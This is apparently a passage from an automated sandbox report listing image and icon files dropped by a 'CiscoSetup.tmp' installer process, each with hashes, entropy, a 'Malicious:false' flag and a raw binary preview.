                                                                                                                                                                                                  Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.
